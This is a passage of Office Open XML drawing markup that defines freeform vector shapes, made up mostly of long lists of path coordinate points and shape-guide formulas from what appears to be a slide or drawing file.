                      <a:pt x="277" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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4121" name="Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="2371"/>
                <a:ext cx="499" cy="209"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1527"/>
                  <a:gd name="T1" fmla="*/ 0 h 638"/>
                  <a:gd name="T2" fmla="*/ 0 w 1527"/>
                  <a:gd name="T3" fmla="*/ 0 h 638"/>
                  <a:gd name="T4" fmla="*/ 0 w 1527"/>
                  <a:gd name="T5" fmla="*/ 0 h 638"/>
                  <a:gd name="T6" fmla="*/ 0 w 1527"/>
                  <a:gd name="T7" fmla="*/ 0 h 638"/>
                  <a:gd name="T8" fmla="*/ 0 w 1527"/>
                  <a:gd name="T9" fmla="*/ 0 h 638"/>
                  <a:gd name="T10" fmla="*/ 0 w 1527"/>
                  <a:gd name="T11" fmla="*/ 0 h 638"/>
                  <a:gd name="T12" fmla="*/ 0 w 1527"/>
                  <a:gd name="T13" fmla="*/ 0 h 638"/>
                  <a:gd name="T14" fmla="*/ 0 w 1527"/>
                  <a:gd name="T15" fmla="*/ 0 h 638"/>
                  <a:gd name="T16" fmla="*/ 0 w 1527"/>
                  <a:gd name="T17" fmla="*/ 0 h 638"/>
                  <a:gd name="T18" fmla="*/ 0 w 1527"/>
                  <a:gd name="T19" fmla="*/ 0 h 638"/>
                  <a:gd name="T20" fmla="*/ 0 w 1527"/>
                  <a:gd name="T21" fmla="*/ 0 h 638"/>
                  <a:gd name="T22" fmla="*/ 0 w 1527"/>
                  <a:gd name="T23" fmla="*/ 0 h 638"/>
                  <a:gd name="T24" fmla="*/ 0 w 1527"/>
                  <a:gd name="T25" fmla="*/ 0 h 638"/>
                  <a:gd name="T26" fmla="*/ 0 w 1527"/>
                  <a:gd name="T27" fmla="*/ 0 h 638"/>
                  <a:gd name="T28" fmla="*/ 0 w 1527"/>
                  <a:gd name="T29" fmla="*/ 0 h 638"/>
                  <a:gd name="T30" fmla="*/ 0 w 1527"/>
                  <a:gd name="T31" fmla="*/ 0 h 638"/>
                  <a:gd name="T32" fmla="*/ 0 w 1527"/>
                  <a:gd name="T33" fmla="*/ 0 h 638"/>
                  <a:gd name="T34" fmla="*/ 0 w 1527"/>
                  <a:gd name="T35" fmla="*/ 0 h 638"/>
                  <a:gd name="T36" fmla="*/ 0 w 1527"/>
                  <a:gd name="T37" fmla="*/ 0 h 638"/>
                  <a:gd name="T38" fmla="*/ 0 w 1527"/>
                  <a:gd name="T39" fmla="*/ 0 h 638"/>
                  <a:gd name="T40" fmla="*/ 0 w 1527"/>
                  <a:gd name="T41" fmla="*/ 0 h 638"/>
                  <a:gd name="T42" fmla="*/ 0 w 1527"/>
                  <a:gd name="T43" fmla="*/ 0 h 638"/>
                  <a:gd name="T44" fmla="*/ 0 w 1527"/>
                  <a:gd name="T45" fmla="*/ 0 h 638"/>
                  <a:gd name="T46" fmla="*/ 0 w 1527"/>
                  <a:gd name="T47" fmla="*/ 0 h 638"/>
                  <a:gd name="T48" fmla="*/ 0 w 1527"/>
                  <a:gd name="T49" fmla="*/ 0 h 638"/>
                  <a:gd name="T50" fmla="*/ 0 w 1527"/>
                  <a:gd name="T51" fmla="*/ 0 h 638"/>
                  <a:gd name="T52" fmla="*/ 0 w 1527"/>
                  <a:gd name="T53" fmla="*/ 0 h 638"/>
                  <a:gd name="T54" fmla="*/ 0 w 1527"/>
                  <a:gd name="T55" fmla="*/ 0 h 638"/>
                  <a:gd name="T56" fmla="*/ 0 w 1527"/>
                  <a:gd name="T57" fmla="*/ 0 h 638"/>
                  <a:gd name="T58" fmla="*/ 0 w 1527"/>
                  <a:gd name="T59" fmla="*/ 0 h 638"/>
                  <a:gd name="T60" fmla="*/ 0 w 1527"/>
                  <a:gd name="T61" fmla="*/ 0 h 638"/>
                  <a:gd name="T62" fmla="*/ 0 w 1527"/>
                  <a:gd name="T63" fmla="*/ 0 h 638"/>
                  <a:gd name="T64" fmla="*/ 0 w 1527"/>
                  <a:gd name="T65" fmla="*/ 0 h 638"/>
                  <a:gd name="T66" fmla="*/ 0 w 1527"/>
                  <a:gd name="T67" fmla="*/ 0 h 638"/>
                  <a:gd name="T68" fmla="*/ 0 w 1527"/>
                  <a:gd name="T69" fmla="*/ 0 h 638"/>
                  <a:gd name="T70" fmla="*/ 0 w 1527"/>
                  <a:gd name="T71" fmla="*/ 0 h 638"/>
                  <a:gd name="T72" fmla="*/ 0 w 1527"/>
                  <a:gd name="T73" fmla="*/ 0 h 638"/>
                  <a:gd name="T74" fmla="*/ 0 w 1527"/>
                  <a:gd name="T75" fmla="*/ 0 h 638"/>
                  <a:gd name="T76" fmla="*/ 0 w 1527"/>
                  <a:gd name="T77" fmla="*/ 0 h 638"/>
                  <a:gd name="T78" fmla="*/ 0 w 1527"/>
                  <a:gd name="T79" fmla="*/ 0 h 638"/>
                  <a:gd name="T80" fmla="*/ 0 w 1527"/>
                  <a:gd name="T81" fmla="*/ 0 h 638"/>
                  <a:gd name="T82" fmla="*/ 0 w 1527"/>
                  <a:gd name="T83" fmla="*/ 0 h 638"/>
                  <a:gd name="T84" fmla="*/ 0 w 1527"/>
                  <a:gd name="T85" fmla="*/ 0 h 638"/>
                  <a:gd name="T86" fmla="*/ 0 w 1527"/>
                  <a:gd name="T87" fmla="*/ 0 h 638"/>
                  <a:gd name="T88" fmla="*/ 0 w 1527"/>
                  <a:gd name="T89" fmla="*/ 0 h 638"/>
                  <a:gd name="T90" fmla="*/ 0 w 1527"/>
                  <a:gd name="T91" fmla="*/ 0 h 638"/>
                  <a:gd name="T92" fmla="*/ 0 w 1527"/>
                  <a:gd name="T93" fmla="*/ 0 h 638"/>
                  <a:gd name="T94" fmla="*/ 0 w 1527"/>
                  <a:gd name="T95" fmla="*/ 0 h 638"/>
                  <a:gd name="T96" fmla="*/ 0 w 1527"/>
                  <a:gd name="T97" fmla="*/ 0 h 638"/>
                  <a:gd name="T98" fmla="*/ 0 w 1527"/>
                  <a:gd name="T99" fmla="*/ 0 h 638"/>
                  <a:gd name="T100" fmla="*/ 0 w 1527"/>
                  <a:gd name="T101" fmla="*/ 0 h 638"/>
                  <a:gd name="T102" fmla="*/ 0 w 1527"/>
                  <a:gd name="T103" fmla="*/ 0 h 638"/>
                  <a:gd name="T104" fmla="*/ 0 w 1527"/>
                  <a:gd name="T105" fmla="*/ 0 h 638"/>
                  <a:gd name="T106" fmla="*/ 0 w 1527"/>
                  <a:gd name="T107" fmla="*/ 0 h 638"/>
                  <a:gd name="T108" fmla="*/ 0 w 1527"/>
                  <a:gd name="T109" fmla="*/ 0 h 638"/>
                  <a:gd name="T110" fmla="*/ 0 w 1527"/>
                  <a:gd name="T111" fmla="*/ 0 h 63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27"/>
                  <a:gd name="T169" fmla="*/ 0 h 638"/>
                  <a:gd name="T170" fmla="*/ 1527 w 1527"/>
                  <a:gd name="T171" fmla="*/ 638 h 63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27" h="638">
                    <a:moveTo>
                      <a:pt x="684" y="295"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="684" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="846" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="872" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="877" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="886" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="921" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="932" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="942" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="950" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="956" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="962" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="971" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="983" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="997" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1009" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1021" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1030" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1037" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1055" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1105" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1157" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1177" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1236" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1271" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1307" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1312" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1318" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
